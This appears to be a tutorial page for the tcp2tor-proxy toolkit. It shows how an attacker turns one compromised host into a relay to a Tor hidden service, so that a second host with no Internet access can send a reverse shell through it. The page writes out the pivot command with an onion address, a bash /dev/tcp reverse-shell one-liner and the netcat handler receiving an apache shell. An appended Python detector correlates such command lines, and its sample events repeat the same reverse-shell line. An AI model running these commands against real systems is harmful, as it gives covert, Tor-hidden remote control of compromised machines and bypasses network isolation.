# Remote port forwarding with tcp2tor-proxy

We assume that Victim2 does not have Internet access, so it cannot reach Tor directly. However, we can use **tcp2tor-proxy** to make Victim1 act as a Tor proxy for Victim2.

As shown in the following illustration, the attacker publishes a Hidden Service with a handler. With tcp2tor-proxy, Victim1 serves a TCP port that routes traffic directly to the Hidden Service. Victim2 then sends a simple reverse shell to Victim1 in order to reach the attacker's handler.

![Remote port forwarding](https://3776602765-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MdYqz4mHYcT7Pvv1Pvk%2F-MdhJ-bPEVjFmsFPlDC1%2F-MdhKP6otkj-JuzTnm8f%2F05_tcp2tor-proxy.png?alt=media\&token=e64cdb9b-18ec-4861-9610-adf0d9693471)

## 1. Set up the remote port forwarding

{% hint style="info" %}
Beforehand, the attacker needs a **Hidden Service up and running** with an associated onion address. The attacker should also **run a netcat handler** for the incoming connections.
{% endhint %}

As Victim1 is the host we will use as a pivot, we will run **tcp2tor-proxy** on it:

```
[victim1]$ ./tcp2tor-proxy -listen 0.0.0.0:60101 \
    -onion-forward m5et..jyd.onion:4444
...
Proxying 0.0.0.0:60101 -> m5et..jyd.onion:4444
```

Now the pivot is listening for TCP traffic on port `60101`, which will be routed to the Hidden Service the attacker owns.

## 2. Reverse shell to tcp2tor-proxy

As the traffic that reaches tcp2tor-proxy will be routed to the Hidden Service, Victim2 only needs to send a **simple reverse shell to the pivot**:

```
[victim2]$ bash -i >& /dev/tcp/victim1/60101 0>&1
```

After executing the above command, the attacker will receive the shell:

```
[attacker]$ nc -lnvp 1234
...
id
uid=48(apache) gid=48(apache) groups=48(apache)
```
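
A defender-side view of the two steps above, as an added example that is not part of the original page or of the toolkit: it correlates process command lines collected from several hosts to link a `/dev/tcp` connection to an onion-forwarding listener. The event tuples, the `build01`, `db01` and `web02` hosts, and the assumption that the `/dev/tcp` target name equals the listener's host name are constructed for illustration.

```python
import re
from collections import namedtuple

Finding = namedtuple("Finding", "source pivot port onion")

# Step 1 pattern: a listener relaying to an onion address (-listen / -onion-forward).
RELAY = re.compile(r"-listen\s+\S+:(?P<port>\d+).*?-onion-forward\s+(?P<onion>\S+\.onion:\d+)")
# Step 2 pattern: bash /dev/tcp redirection towards host/port.
DEVTCP = re.compile(r"/dev/tcp/(?P<host>[^/\s]+)/(?P<port>\d+)")

# Constructed process-creation events (host, command line); not real telemetry.
# A redirection is only visible in a command line when it is passed as a string
# (e.g. bash -c '...'); for interactive shells, command logging is needed instead.
SAMPLE_EVENTS = [
    ("victim1", "./tcp2tor-proxy -listen 0.0.0.0:60101 -onion-forward m5et..jyd.onion:4444"),
    ("victim2", "bash -c 'bash -i >& /dev/tcp/victim1/60101 0>&1'"),
    ("build01", "bash -c 'exec 3<>/dev/tcp/db01/5432'"),
    ("web02", "nginx -g 'daemon off;'"),
]

def find_relays(events):
    """Map (host, listen port) -> onion target for each onion-forwarding listener."""
    relays = {}
    for host, cmd in events:
        m = RELAY.search(cmd)
        if m:
            relays[(host, int(m["port"]))] = m["onion"]
    return relays

def analyze(events):
    """Split /dev/tcp connections into those that hit an onion relay and the rest."""
    relays = find_relays(events)
    chains, unlinked = [], []
    for host, cmd in events:
        for m in DEVTCP.finditer(cmd):
            key = (m["host"], int(m["port"]))
            if key in relays:
                chains.append(Finding(host, key[0], key[1], relays[key]))
            else:
                unlinked.append((host, key[0], key[1]))
    return chains, unlinked

if __name__ == "__main__":
    chains, unlinked = analyze(SAMPLE_EVENTS)
    for f in chains:
        print(f"HIGH {f.source} -> {f.pivot}:{f.port} -> {f.onion}")
    for src, dst, port in unlinked:
        print(f"REVIEW {src} -> {dst}:{port} via /dev/tcp")
```

A host that has no Internet route of its own, like Victim2 here, never contacts Tor itself, so only the correlation with the pivot's listener ties its connection to the onion address.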

